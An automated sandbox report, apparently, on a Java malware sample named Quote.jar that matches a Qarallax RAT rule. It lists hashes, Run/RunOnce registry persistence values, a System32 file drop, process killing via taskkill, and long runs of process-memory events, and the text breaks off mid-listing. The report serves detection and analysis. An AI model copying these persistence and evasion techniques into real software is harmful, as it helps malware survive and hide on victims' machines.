Analysis
-
max time kernel
113s -
max time network
146s -
platform
windows7_x64 -
resource
win7 -
submitted
18-08-2020 19:48
Static task
static1
Behavioral task
behavioral1
Sample
Quote.jar
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Quote.jar
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Quote.jar
-
Size
399KB
-
MD5
2b68744fed1c4c5c156a4247160fa8f8
-
SHA1
50cb830acadbe050d1cdd3cc1e8516e76a9ab30b
-
SHA256
e06e4d0ce2a189209e34ee24832d021418781872dae863ffa2b4126b14e17b15
-
SHA512
4ed06e23b899d465efc0b75a42b283a48c07eb8ae0dd1848df7a700032324a6a8d7368bb2bad5b7ccc4041b7fd2df447bc60278d65a717989f82d8fff771fe49
Score
10/10
Malware Config
Signatures
-
Qarallax RAT support DLL 1 IoCs
resource yara_rule behavioral1/files/0x0003000000013551-7.dat qarallax_dll -
Loads dropped DLL 1 IoCs
pid Process 1460 java.exe -
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\DEPOFJF = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\UaoPj\\SbBYi.class\"" java.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run java.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\DEPOFJF = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\UaoPj\\SbBYi.class\"" java.exe -
Drops desktop.ini file(s) 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\UaoPj\Desktop.ini java.exe File created C:\Users\Admin\UaoPj\Desktop.ini java.exe File opened for modification C:\Users\Admin\UaoPj\Desktop.ini attrib.exe File opened for modification C:\Users\Admin\UaoPj\Desktop.ini attrib.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\Zbotx java.exe File created C:\Windows\System32\Zbotx java.exe -
Kills process with taskkill 16 IoCs
pid Process 2056 taskkill.exe 2036 taskkill.exe 1888 taskkill.exe 1056 taskkill.exe 2708 taskkill.exe 2828 taskkill.exe 1416 taskkill.exe 1872 taskkill.exe 2168 taskkill.exe 2460 taskkill.exe 2556 taskkill.exe 1072 taskkill.exe 1996 taskkill.exe 1332 taskkill.exe 1864 taskkill.exe 2280 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1628 powershell.exe 1628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 137 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1536 WMIC.exe Token: SeSecurityPrivilege 1536 WMIC.exe Token: SeTakeOwnershipPrivilege 1536 WMIC.exe Token: SeLoadDriverPrivilege 1536 WMIC.exe Token: SeSystemProfilePrivilege 1536 WMIC.exe Token: SeSystemtimePrivilege 1536 WMIC.exe Token: SeProfSingleProcessPrivilege 1536 WMIC.exe Token: SeIncBasePriorityPrivilege 1536 WMIC.exe Token: SeCreatePagefilePrivilege 1536 WMIC.exe Token: SeBackupPrivilege 1536 WMIC.exe Token: SeRestorePrivilege 1536 WMIC.exe Token: SeShutdownPrivilege 1536 WMIC.exe Token: SeDebugPrivilege 1536 WMIC.exe Token: SeSystemEnvironmentPrivilege 1536 WMIC.exe Token: SeRemoteShutdownPrivilege 1536 WMIC.exe Token: SeUndockPrivilege 1536 WMIC.exe Token: SeManageVolumePrivilege 1536 WMIC.exe Token: 33 1536 WMIC.exe Token: 34 1536 WMIC.exe Token: 35 1536 WMIC.exe Token: SeIncreaseQuotaPrivilege 1536 WMIC.exe Token: SeSecurityPrivilege 1536 WMIC.exe Token: SeTakeOwnershipPrivilege 1536 WMIC.exe Token: SeLoadDriverPrivilege 1536 WMIC.exe Token: SeSystemProfilePrivilege 1536 WMIC.exe Token: SeSystemtimePrivilege 1536 WMIC.exe Token: SeProfSingleProcessPrivilege 1536 WMIC.exe Token: SeIncBasePriorityPrivilege 1536 WMIC.exe Token: SeCreatePagefilePrivilege 1536 WMIC.exe Token: SeBackupPrivilege 1536 WMIC.exe Token: SeRestorePrivilege 1536 WMIC.exe Token: SeShutdownPrivilege 1536 WMIC.exe Token: SeDebugPrivilege 1536 WMIC.exe Token: SeSystemEnvironmentPrivilege 1536 WMIC.exe Token: SeRemoteShutdownPrivilege 1536 WMIC.exe Token: SeUndockPrivilege 1536 WMIC.exe Token: SeManageVolumePrivilege 1536 WMIC.exe Token: 33 1536 WMIC.exe Token: 34 1536 WMIC.exe Token: 35 1536 WMIC.exe Token: SeIncreaseQuotaPrivilege 1816 WMIC.exe Token: SeSecurityPrivilege 1816 WMIC.exe Token: SeTakeOwnershipPrivilege 1816 WMIC.exe Token: SeLoadDriverPrivilege 1816 WMIC.exe Token: SeSystemProfilePrivilege 1816 WMIC.exe Token: SeSystemtimePrivilege 1816 WMIC.exe Token: SeProfSingleProcessPrivilege 1816 WMIC.exe Token: SeIncBasePriorityPrivilege 1816 WMIC.exe Token: SeCreatePagefilePrivilege 1816 WMIC.exe Token: SeBackupPrivilege 1816 WMIC.exe Token: SeRestorePrivilege 1816 WMIC.exe Token: SeShutdownPrivilege 1816 WMIC.exe Token: SeDebugPrivilege 1816 WMIC.exe Token: SeSystemEnvironmentPrivilege 1816 WMIC.exe Token: SeRemoteShutdownPrivilege 1816 WMIC.exe Token: SeUndockPrivilege 1816 WMIC.exe Token: SeManageVolumePrivilege 1816 WMIC.exe Token: 33 1816 WMIC.exe Token: 34 1816 WMIC.exe Token: 35 1816 WMIC.exe Token: SeIncreaseQuotaPrivilege 1816 WMIC.exe Token: SeSecurityPrivilege 1816 WMIC.exe Token: SeTakeOwnershipPrivilege 1816 WMIC.exe Token: SeLoadDriverPrivilege 1816 WMIC.exe Token: SeSystemProfilePrivilege 1816 WMIC.exe Token: SeSystemtimePrivilege 1816 WMIC.exe Token: SeProfSingleProcessPrivilege 1816 WMIC.exe Token: SeIncBasePriorityPrivilege 1816 WMIC.exe Token: SeCreatePagefilePrivilege 1816 WMIC.exe Token: SeBackupPrivilege 1816 WMIC.exe Token: SeRestorePrivilege 1816 WMIC.exe Token: SeShutdownPrivilege 1816 WMIC.exe Token: SeDebugPrivilege 1816 WMIC.exe Token: SeSystemEnvironmentPrivilege 1816 WMIC.exe Token: SeRemoteShutdownPrivilege 1816 WMIC.exe Token: SeUndockPrivilege 1816 WMIC.exe Token: SeManageVolumePrivilege 1816 WMIC.exe Token: 33 1816 WMIC.exe Token: 34 1816 WMIC.exe Token: 35 1816 WMIC.exe Token: SeDebugPrivilege 2036 taskkill.exe Token: SeDebugPrivilege 1072 taskkill.exe Token: SeIncreaseQuotaPrivilege 1124 WMIC.exe Token: SeSecurityPrivilege 1124 WMIC.exe Token: SeTakeOwnershipPrivilege 1124 WMIC.exe Token: SeLoadDriverPrivilege 1124 WMIC.exe Token: SeSystemProfilePrivilege 1124 WMIC.exe Token: SeSystemtimePrivilege 1124 WMIC.exe Token: SeProfSingleProcessPrivilege 1124 WMIC.exe Token: SeIncBasePriorityPrivilege 1124 WMIC.exe Token: SeCreatePagefilePrivilege 1124 WMIC.exe Token: SeBackupPrivilege 1124 WMIC.exe Token: SeRestorePrivilege 1124 WMIC.exe Token: SeShutdownPrivilege 1124 WMIC.exe Token: SeDebugPrivilege 1124 WMIC.exe Token: SeSystemEnvironmentPrivilege 1124 WMIC.exe Token: SeRemoteShutdownPrivilege 1124 WMIC.exe Token: SeUndockPrivilege 1124 WMIC.exe Token: SeManageVolumePrivilege 1124 WMIC.exe Token: 33 1124 WMIC.exe Token: 34 1124 WMIC.exe Token: 35 1124 WMIC.exe Token: SeDebugPrivilege 1888 taskkill.exe Token: SeDebugPrivilege 1056 taskkill.exe Token: SeDebugPrivilege 1996 taskkill.exe Token: SeDebugPrivilege 1416 taskkill.exe Token: SeDebugPrivilege 1872 taskkill.exe Token: SeIncreaseQuotaPrivilege 1124 WMIC.exe Token: SeSecurityPrivilege 1124 WMIC.exe Token: SeTakeOwnershipPrivilege 1124 WMIC.exe Token: SeLoadDriverPrivilege 1124 WMIC.exe Token: SeSystemProfilePrivilege 1124 WMIC.exe Token: SeSystemtimePrivilege 1124 WMIC.exe Token: SeProfSingleProcessPrivilege 1124 WMIC.exe Token: SeIncBasePriorityPrivilege 1124 WMIC.exe Token: SeCreatePagefilePrivilege 1124 WMIC.exe Token: SeBackupPrivilege 1124 WMIC.exe Token: SeRestorePrivilege 1124 WMIC.exe Token: SeShutdownPrivilege 1124 WMIC.exe Token: SeDebugPrivilege 1124 WMIC.exe Token: SeSystemEnvironmentPrivilege 1124 WMIC.exe Token: SeRemoteShutdownPrivilege 1124 WMIC.exe Token: SeUndockPrivilege 1124 WMIC.exe Token: SeManageVolumePrivilege 1124 WMIC.exe Token: 33 1124 WMIC.exe Token: 34 1124 WMIC.exe Token: 35 1124 WMIC.exe Token: SeDebugPrivilege 1332 taskkill.exe Token: SeDebugPrivilege 1864 taskkill.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 2168 taskkill.exe Token: SeDebugPrivilege 2280 taskkill.exe Token: SeDebugPrivilege 2556 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 2708 taskkill.exe Token: SeDebugPrivilege 2828 taskkill.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1460 java.exe -
Suspicious use of WriteProcessMemory 714 IoCs
description pid Process procid_target PID 1460 wrote to memory of 1644 1460 java.exe 25 PID 1460 wrote to memory of 1644 1460 java.exe 25 PID 1460 wrote to memory of 1644 1460 java.exe 25 PID 1460 wrote to memory of 1056 1460 java.exe 26 PID 1460 wrote to memory of 1056 1460 java.exe 26 PID 1460 wrote to memory of 1056 1460 java.exe 26 PID 1056 wrote to memory of 1536 1056 cmd.exe 27 PID 1056 wrote to memory of 1536 1056 cmd.exe 27 PID 1056 wrote to memory of 1536 1056 cmd.exe 27 PID 1460 wrote to memory of 1760 1460 java.exe 28 PID 1460 wrote to memory of 1760 1460 java.exe 28 PID 1460 wrote to memory of 1760 1460 java.exe 28 PID 1760 wrote to memory of 1816 1760 cmd.exe 29 PID 1760 wrote to memory of 1816 1760 cmd.exe 29 PID 1760 wrote to memory of 1816 1760 cmd.exe 29 PID 1460 wrote to memory of 1852 1460 java.exe 30 PID 1460 wrote to memory of 1852 1460 java.exe 30 PID 1460 wrote to memory of 1852 1460 java.exe 30 PID 1460 wrote to memory of 1284 1460 java.exe 31 PID 1460 wrote to memory of 1284 1460 java.exe 31 PID 1460 wrote to memory of 1284 1460 java.exe 31 PID 1460 wrote to memory of 1900 1460 java.exe 32 PID 1460 wrote to memory of 1900 1460 java.exe 32 PID 1460 wrote to memory of 1900 1460 java.exe 32 PID 1460 wrote to memory of 1896 1460 java.exe 33 PID 1460 wrote to memory of 1896 1460 java.exe 33 PID 1460 wrote to memory of 1896 1460 java.exe 33 PID 1460 wrote to memory of 1868 1460 java.exe 34 PID 1460 wrote to memory of 1868 1460 java.exe 34 PID 1460 wrote to memory of 1868 1460 java.exe 34 PID 1460 wrote to memory of 1828 1460 java.exe 35 PID 1460 wrote to memory of 1828 1460 java.exe 35 PID 1460 wrote to memory of 1828 1460 java.exe 35 PID 1460 wrote to memory of 1832 1460 java.exe 36 PID 1460 wrote to memory of 1832 1460 java.exe 36 PID 1460 wrote to memory of 1832 1460 java.exe 36 PID 1460 wrote to memory of 1756 1460 java.exe 37 PID 1460 wrote to memory of 1756 1460 java.exe 37 PID 1460 wrote to memory of 1756 1460 java.exe 37 PID 1460 wrote to memory of 1588 1460 java.exe 38 PID 1460 wrote to memory of 1588 1460 java.exe 38 PID 1460 wrote to memory of 1588 1460 java.exe 38 PID 1588 wrote to memory of 1580 1588 cmd.exe 39 PID 1588 wrote to memory of 1580 1588 cmd.exe 39 PID 1588 wrote to memory of 1580 1588 cmd.exe 39 PID 1460 wrote to memory of 1628 1460 java.exe 40 PID 1460 wrote to memory of 1628 1460 java.exe 40 PID 1460 wrote to memory of 1628 1460 java.exe 40 PID 1460 wrote to memory of 1992 1460 java.exe 41 PID 1460 wrote to memory of 1992 1460 java.exe 41 PID 1460 wrote to memory of 1992 1460 java.exe 41 PID 1460 wrote to memory of 1956 1460 java.exe 42 PID 1460 wrote to memory of 1956 1460 java.exe 42 PID 1460 wrote to memory of 1956 1460 java.exe 42 PID 1460 wrote to memory of 2036 1460 java.exe 44 PID 1460 wrote to memory of 2036 1460 java.exe 44 PID 1460 wrote to memory of 2036 1460 java.exe 44 PID 1588 wrote to memory of 1996 1588 cmd.exe 47 PID 1588 wrote to memory of 1996 1588 cmd.exe 47 PID 1588 wrote to memory of 1996 1588 cmd.exe 47 PID 1460 wrote to memory of 836 1460 java.exe 48 PID 1460 wrote to memory of 836 1460 java.exe 48 PID 1460 wrote to memory of 836 1460 java.exe 48 PID 1460 wrote to memory of 1180 1460 java.exe 50 PID 1460 wrote to memory of 1180 1460 java.exe 50 PID 1460 wrote to memory of 1180 1460 java.exe 50 PID 1460 wrote to memory of 852 1460 java.exe 51 PID 1460 wrote to memory of 852 1460 java.exe 51 PID 1460 wrote to memory of 852 1460 java.exe 51 PID 1460 wrote to memory of 1568 1460 java.exe 53 PID 1460 wrote to memory of 1568 1460 java.exe 53 PID 1460 wrote to memory of 1568 1460 java.exe 53 PID 852 wrote to memory of 368 852 cmd.exe 54 PID 852 wrote to memory of 368 852 cmd.exe 54 PID 852 wrote to memory of 368 852 cmd.exe 54 PID 852 wrote to memory of 1388 852 cmd.exe 56 PID 852 wrote to memory of 1388 852 cmd.exe 56 PID 852 wrote to memory of 1388 852 cmd.exe 56 PID 1460 wrote to memory of 1072 1460 java.exe 57 PID 1460 wrote to memory of 1072 1460 java.exe 57 PID 1460 wrote to memory of 1072 1460 java.exe 57 PID 1460 wrote to memory of 1532 1460 java.exe 59 PID 1460 wrote to memory of 1532 1460 java.exe 59 PID 1460 wrote to memory of 1532 1460 java.exe 59 PID 1532 wrote to memory of 1528 1532 cmd.exe 60 PID 1532 wrote to memory of 1528 1532 cmd.exe 60 PID 1532 wrote to memory of 1528 1532 cmd.exe 60 PID 1532 wrote to memory of 1764 1532 cmd.exe 62 PID 1532 wrote to memory of 1764 1532 cmd.exe 62 PID 1532 wrote to memory of 1764 1532 cmd.exe 62 PID 1460 wrote to memory of 1148 1460 java.exe 63 PID 1460 wrote to memory of 1148 1460 java.exe 63 PID 1460 wrote to memory of 1148 1460 java.exe 63 PID 1460 wrote to memory of 768 1460 java.exe 64 PID 1460 wrote to memory of 768 1460 java.exe 64 PID 1460 wrote to memory of 768 1460 java.exe 64 PID 1460 wrote to memory of 1888 1460 java.exe 66 PID 1460 wrote to memory of 1888 1460 java.exe 66 PID 1460 wrote to memory of 1888 1460 java.exe 66 PID 1148 wrote to memory of 1124 1148 cmd.exe 65 PID 1148 wrote to memory of 1124 1148 cmd.exe 65 PID 1148 wrote to memory of 1124 1148 cmd.exe 65 PID 768 wrote to memory of 1892 768 cmd.exe 67 PID 768 wrote to memory of 1892 768 cmd.exe 67 PID 768 wrote to memory of 1892 768 cmd.exe 67 PID 768 wrote to memory of 1864 768 cmd.exe 69 PID 768 wrote to memory of 1864 768 cmd.exe 69 PID 768 wrote to memory of 1864 768 cmd.exe 69 PID 1460 wrote to memory of 1924 1460 java.exe 70 PID 1460 wrote to memory of 1924 1460 java.exe 70 PID 1460 wrote to memory of 1924 1460 java.exe 70 PID 1924 wrote to memory of 1868 1924 cmd.exe 71 PID 1924 wrote to memory of 1868 1924 cmd.exe 71 PID 1924 wrote to memory of 1868 1924 cmd.exe 71 PID 1924 wrote to memory of 1044 1924 cmd.exe 72 PID 1924 wrote to memory of 1044 1924 cmd.exe 72 PID 1924 wrote to memory of 1044 1924 cmd.exe 72 PID 1460 wrote to memory of 1056 1460 java.exe 73 PID 1460 wrote to memory of 1056 1460 java.exe 73 PID 1460 wrote to memory of 1056 1460 java.exe 73 PID 1460 wrote to memory of 1740 1460 java.exe 75 PID 1460 wrote to memory of 1740 1460 java.exe 75 PID 1460 wrote to memory of 1740 1460 java.exe 75 PID 1740 wrote to memory of 2016 1740 cmd.exe 76 PID 1740 wrote to memory of 2016 1740 cmd.exe 76 PID 1740 wrote to memory of 2016 1740 cmd.exe 76 PID 1740 wrote to memory of 1948 1740 cmd.exe 77 PID 1740 wrote to memory of 1948 1740 cmd.exe 77 PID 1740 wrote to memory of 1948 1740 cmd.exe 77 PID 1460 wrote to memory of 1580 1460 java.exe 78 PID 1460 wrote to memory of 1580 1460 java.exe 78 PID 1460 wrote to memory of 1580 1460 java.exe 78 PID 1460 wrote to memory of 1996 1460 java.exe 79 PID 1460 wrote to memory of 1996 1460 java.exe 79 PID 1460 wrote to memory of 1996 1460 java.exe 79 PID 1580 wrote to memory of 240 1580 cmd.exe 81 PID 1580 wrote to memory of 240 1580 cmd.exe 81 PID 1580 wrote to memory of 240 1580 cmd.exe 81 PID 1580 wrote to memory of 1992 1580 cmd.exe 82 PID 1580 wrote to memory of 1992 1580 cmd.exe 82 PID 1580 wrote to memory of 1992 1580 cmd.exe 82 PID 1460 wrote to memory of 1424 1460 java.exe 83 PID 1460 wrote to memory of 1424 1460 java.exe 83 PID 1460 wrote to memory of 1424 1460 java.exe 83 PID 1424 wrote to memory of 832 1424 cmd.exe 84 PID 1424 wrote to memory of 832 1424 cmd.exe 84 PID 1424 wrote to memory of 832 1424 cmd.exe 84 PID 1460 wrote to memory of 1416 1460 java.exe 85 PID 1460 wrote to memory of 1416 1460 java.exe 85 PID 1460 wrote to memory of 1416 1460 java.exe 85 PID 1424 wrote to memory of 756 1424 cmd.exe 87 PID 1424 wrote to memory of 756 1424 cmd.exe 87 PID 1424 wrote to memory of 756 1424 cmd.exe 87 PID 1460 wrote to memory of 1084 1460 java.exe 88 PID 1460 wrote to memory of 1084 1460 java.exe 88 PID 1460 wrote to memory of 1084 1460 java.exe 88 PID 1084 wrote to memory of 1520 1084 cmd.exe 89 PID 1084 wrote to memory of 1520 1084 cmd.exe 89 PID 1084 wrote to memory of 1520 1084 cmd.exe 89 PID 1084 wrote to memory of 1772 1084 cmd.exe 90 PID 1084 wrote to memory of 1772 1084 cmd.exe 90 PID 1084 wrote to memory of 1772 1084 cmd.exe 90 PID 1460 wrote to memory of 1872 1460 java.exe 91 PID 1460 wrote to memory of 1872 1460 java.exe 91 PID 1460 wrote to memory of 1872 1460 java.exe 91 PID 1460 wrote to memory of 1692 1460 java.exe 93 PID 1460 wrote to memory of 1692 1460 java.exe 93 PID 1460 wrote to memory of 1692 1460 java.exe 93 PID 1692 wrote to memory of 1864 1692 cmd.exe 94 PID 1692 wrote to memory of 1864 1692 cmd.exe 94 PID 1692 wrote to memory of 1864 1692 cmd.exe 94 PID 1692 wrote to memory of 1052 1692 cmd.exe 95 PID 1692 wrote to memory of 1052 1692 cmd.exe 95 PID 1692 wrote to memory of 1052 1692 cmd.exe 95 PID 1460 wrote to memory of 1044 1460 java.exe 96 PID 1460 wrote to memory of 1044 1460 java.exe 96 PID 1460 wrote to memory of 1044 1460 java.exe 96 PID 1044 wrote to memory of 2044 1044 cmd.exe 97 PID 1044 wrote to memory of 2044 1044 cmd.exe 97 PID 1044 wrote to memory of 2044 1044 cmd.exe 97 PID 1044 wrote to memory of 1948 1044 cmd.exe 98 PID 1044 wrote to memory of 1948 1044 cmd.exe 98 PID 1044 wrote to memory of 1948 1044 cmd.exe 98 PID 1460 wrote to memory of 1332 1460 java.exe 99 PID 1460 wrote to memory of 1332 1460 java.exe 99 PID 1460 wrote to memory of 1332 1460 java.exe 99 PID 1460 wrote to memory of 1372 1460 java.exe 101 PID 1460 wrote to memory of 1372 1460 java.exe 101 PID 1460 wrote to memory of 1372 1460 java.exe 101 PID 1372 wrote to memory of 1568 1372 cmd.exe 102 PID 1372 wrote to memory of 1568 1372 cmd.exe 102 PID 1372 wrote to memory of 1568 1372 cmd.exe 102 PID 1372 wrote to memory of 1764 1372 cmd.exe 103 PID 1372 wrote to memory of 1764 1372 cmd.exe 103 PID 1372 wrote to memory of 1764 1372 cmd.exe 103 PID 1460 wrote to memory of 932 1460 java.exe 104 PID 1460 wrote to memory of 932 1460 java.exe 104 PID 1460 wrote to memory of 932 1460 java.exe 104 PID 1460 wrote to memory of 1864 1460 java.exe 105 PID 1460 wrote to memory of 1864 1460 java.exe 105 PID 1460 wrote to memory of 1864 1460 java.exe 105 PID 932 wrote to memory of 1592 932 cmd.exe 106 PID 932 wrote to memory of 1592 932 cmd.exe 106 PID 932 wrote to memory of 1592 932 cmd.exe 106 PID 932 wrote to memory of 1948 932 cmd.exe 108 PID 932 wrote to memory of 1948 932 cmd.exe 108 PID 932 wrote to memory of 1948 932 cmd.exe 108 PID 1460 wrote to memory of 1764 1460 java.exe 109 PID 1460 wrote to memory of 1764 1460 java.exe 109 PID 1460 wrote to memory of 1764 1460 java.exe 109 PID 1764 wrote to memory of 680 1764 cmd.exe 110 PID 1764 wrote to memory of 680 1764 cmd.exe 110 PID 1764 wrote to memory of 680 1764 cmd.exe 110 PID 1460 wrote to memory of 2056 1460 java.exe 111 PID 1460 wrote to memory of 2056 1460 java.exe 111 PID 1460 wrote to memory of 2056 1460 java.exe 111 PID 1764 wrote to memory of 2088 1764 cmd.exe 113 PID 1764 wrote to memory of 2088 1764 cmd.exe 113 PID 1764 wrote to memory of 2088 1764 cmd.exe 113 PID 1460 wrote to memory of 2108 1460 java.exe 114 PID 1460 wrote to memory of 2108 1460 java.exe 114 PID 1460 wrote to memory of 2108 1460 java.exe 114 PID 2108 wrote to memory of 2128 2108 cmd.exe 115 PID 2108 wrote to memory of 2128 2108 cmd.exe 115 PID 2108 wrote to memory of 2128 2108 cmd.exe 115 PID 2108 wrote to memory of 2156 2108 cmd.exe 116 PID 2108 wrote to memory of 2156 2108 cmd.exe 116 PID 2108 wrote to memory of 2156 2108 cmd.exe 116 PID 1460 wrote to memory of 2168 1460 java.exe 117 PID 1460 wrote to memory of 2168 1460 java.exe 117 PID 1460 wrote to memory of 2168 1460 java.exe 117 PID 1460 wrote to memory of 2204 1460 java.exe 119 PID 1460 wrote to memory of 2204 1460 java.exe 119 PID 1460 wrote to memory of 2204 1460 java.exe 119 PID 2204 wrote to memory of 2224 2204 cmd.exe 120 PID 2204 wrote to memory of 2224 2204 cmd.exe 120 PID 2204 wrote to memory of 2224 2204 cmd.exe 120 PID 2204 wrote to memory of 2256 2204 cmd.exe 121 PID 2204 wrote to memory of 2256 2204 cmd.exe 121 PID 2204 wrote to memory of 2256 2204 cmd.exe 121 PID 1460 wrote to memory of 2280 1460 java.exe 122 PID 1460 wrote to memory of 2280 1460 java.exe 122 PID 1460 wrote to memory of 2280 1460 java.exe 122 PID 1460 wrote to memory of 2292 1460 java.exe 123 PID 1460 wrote to memory of 2292 1460 java.exe 123 PID 1460 wrote to memory of 2292 1460 java.exe 123 PID 2292 wrote to memory of 2344 2292 cmd.exe 125 PID 2292 wrote to memory of 2344 2292 cmd.exe 125 PID 2292 wrote to memory of 2344 2292 cmd.exe 125 PID 2292 wrote to memory of 2364 2292 cmd.exe 126 PID 2292 wrote to memory of 2364 2292 cmd.exe 126 PID 2292 wrote to memory of 2364 2292 cmd.exe 126 PID 1460 wrote to memory of 2384 1460 java.exe 127 PID 1460 wrote to memory of 2384 1460 java.exe 127 PID 1460 wrote to memory of 2384 1460 java.exe 127 PID 2384 wrote to memory of 2412 2384 cmd.exe 128 PID 2384 wrote to memory of 2412 2384 cmd.exe 128 PID 2384 wrote to memory of 2412 2384 cmd.exe 128 PID 1460 wrote to memory of 2460 1460 java.exe 129 PID 1460 wrote to memory of 2460 1460 java.exe 129 PID 1460 wrote to memory of 2460 1460 java.exe 129 PID 2384 wrote to memory of 2472 2384 cmd.exe 130 PID 2384 wrote to memory of 2472 2384 cmd.exe 130 PID 2384 wrote to memory of 2472 2384 cmd.exe 130 PID 1460 wrote to memory of 2504 1460 java.exe 132 PID 1460 wrote to memory of 2504 1460 java.exe 132 PID 1460 wrote to memory of 2504 1460 java.exe 132 PID 2504 wrote to memory of 2532 2504 cmd.exe 133 PID 2504 wrote to memory of 2532 2504 cmd.exe 133 PID 2504 wrote to memory of 2532 2504 cmd.exe 133 PID 2504 wrote to memory of 2544 2504 cmd.exe 134 PID 2504 wrote to memory of 2544 2504 cmd.exe 134 PID 2504 wrote to memory of 2544 2504 cmd.exe 134 PID 1460 wrote to memory of 2556 1460 java.exe 135 PID 1460 wrote to memory of 2556 1460 java.exe 135 PID 1460 wrote to memory of 2556 1460 java.exe 135 PID 1460 wrote to memory of 2568 1460 java.exe 136 PID 1460 wrote to memory of 2568 1460 java.exe 136 PID 1460 wrote to memory of 2568 1460 java.exe 136 PID 2568 wrote to memory of 2608 2568 cmd.exe 138 PID 2568 wrote to memory of 2608 2568 cmd.exe 138 PID 2568 wrote to memory of 2608 2568 cmd.exe 138 PID 2568 wrote to memory of 2628 2568 cmd.exe 139 PID 2568 wrote to memory of 2628 2568 cmd.exe 139 PID 2568 wrote to memory of 2628 2568 cmd.exe 139 PID 1460 wrote to memory of 2652 1460 java.exe 140 PID 1460 wrote to memory of 2652 1460 java.exe 140 PID 1460 wrote to memory of 2652 1460 java.exe 140 PID 2652 wrote to memory of 2664 2652 cmd.exe 141 PID 2652 wrote to memory of 2664 2652 cmd.exe 141 PID 2652 wrote to memory of 2664 2652 cmd.exe 141 PID 2652 wrote to memory of 2684 2652 cmd.exe 142 PID 2652 wrote to memory of 2684 2652 cmd.exe 142 PID 2652 wrote to memory of 2684 2652 cmd.exe 142 PID 1460 wrote to memory of 2696 1460 java.exe 143 PID 1460 wrote to memory of 2696 1460 java.exe 143 PID 1460 wrote to memory of 2696 1460 java.exe 143 PID 1460 wrote to memory of 2708 1460 java.exe 144 PID 1460 wrote to memory of 2708 1460 java.exe 144 PID 1460 wrote to memory of 2708 1460 java.exe 144 PID 2696 wrote to memory of 2720 2696 cmd.exe 145 PID 2696 wrote to memory of 2720 2696 cmd.exe 145 PID 2696 wrote to memory of 2720 2696 cmd.exe 145 PID 2696 wrote to memory of 2780 2696 cmd.exe 147 PID 2696 wrote to memory of 2780 2696 cmd.exe 147 PID 2696 wrote to memory of 2780 2696 cmd.exe 147 PID 1460 wrote to memory of 2792 1460 java.exe 148 PID 1460 wrote to memory of 2792 1460 java.exe 148 PID 1460 wrote to memory of 2792 1460 java.exe 148 PID 2792 wrote to memory of 2804 2792 cmd.exe 149 PID 2792 wrote to memory of 2804 2792 cmd.exe 149 PID 2792 wrote to memory of 2804 2792 cmd.exe 149 PID 2792 wrote to memory of 2816 2792 cmd.exe 150 PID 2792 wrote to memory of 2816 2792 cmd.exe 150 PID 2792 wrote to memory of 2816 2792 cmd.exe 150 PID 1460 wrote to memory of 2828 1460 java.exe 151 PID 1460 wrote to memory of 2828 1460 java.exe 151 PID 1460 wrote to memory of 2828 1460 java.exe 151 PID 1460 wrote to memory of 2856 1460 java.exe 153 PID 1460 wrote to memory of 2856 1460 java.exe 153 PID 1460 wrote to memory of 2856 1460 java.exe 153 PID 2856 wrote to memory of 2872 2856 cmd.exe 154 PID 2856 wrote to memory of 2872 2856 cmd.exe 154 PID 2856 wrote to memory of 2872 2856 cmd.exe 154 PID 2856 wrote to memory of 2884 2856 cmd.exe 155 PID 2856 wrote to memory of 2884 2856 cmd.exe 155 PID 2856 wrote to memory of 2884 2856 cmd.exe 155 PID 1460 wrote to memory of 2900 1460 java.exe 156 PID 1460 wrote to memory of 2900 1460 java.exe 156 PID 1460 wrote to memory of 2900 1460 java.exe 156 PID 2900 wrote to memory of 2916 2900 cmd.exe 157 PID 2900 wrote to memory of 2916 2900 cmd.exe 157 PID 2900 wrote to memory of 2916 2900 cmd.exe 157 PID 2900 wrote to memory of 2948 2900 cmd.exe 158 PID 2900 wrote to memory of 2948 2900 cmd.exe 158 PID 2900 wrote to memory of 2948 2900 cmd.exe 158 PID 1460 wrote to memory of 2960 1460 java.exe 159 PID 1460 wrote to memory of 2960 1460 java.exe 159 PID 1460 wrote to memory of 2960 1460 java.exe 159 PID 2960 wrote to memory of 2980 2960 cmd.exe 160 PID 2960 wrote to memory of 2980 2960 cmd.exe 160 PID 2960 wrote to memory of 2980 2960 cmd.exe 160 PID 2960 wrote to memory of 2992 2960 cmd.exe 161 PID 2960 wrote to memory of 2992 2960 cmd.exe 161 PID 2960 wrote to memory of 2992 2960 cmd.exe 161 PID 1460 wrote to memory of 3016 1460 java.exe 162 PID 1460 wrote to memory of 3016 1460 java.exe 162 PID 1460 wrote to memory of 3016 1460 java.exe 162 PID 3016 wrote to memory of 3052 3016 cmd.exe 163 PID 3016 wrote to memory of 3052 3016 cmd.exe 163 PID 3016 wrote to memory of 3052 3016 cmd.exe 163 PID 3016 wrote to memory of 612 3016 cmd.exe 164 PID 3016 wrote to memory of 612 3016 cmd.exe 164 PID 3016 wrote to memory of 612 3016 cmd.exe 164 PID 1460 wrote to memory of 2116 1460 java.exe 165 PID 1460 wrote to memory of 2116 1460 java.exe 165 PID 1460 wrote to memory of 2116 1460 java.exe 165 PID 2116 wrote to memory of 2188 2116 cmd.exe 166 PID 2116 wrote to memory of 2188 2116 cmd.exe 166 PID 2116 wrote to memory of 2188 2116 cmd.exe 166 PID 2116 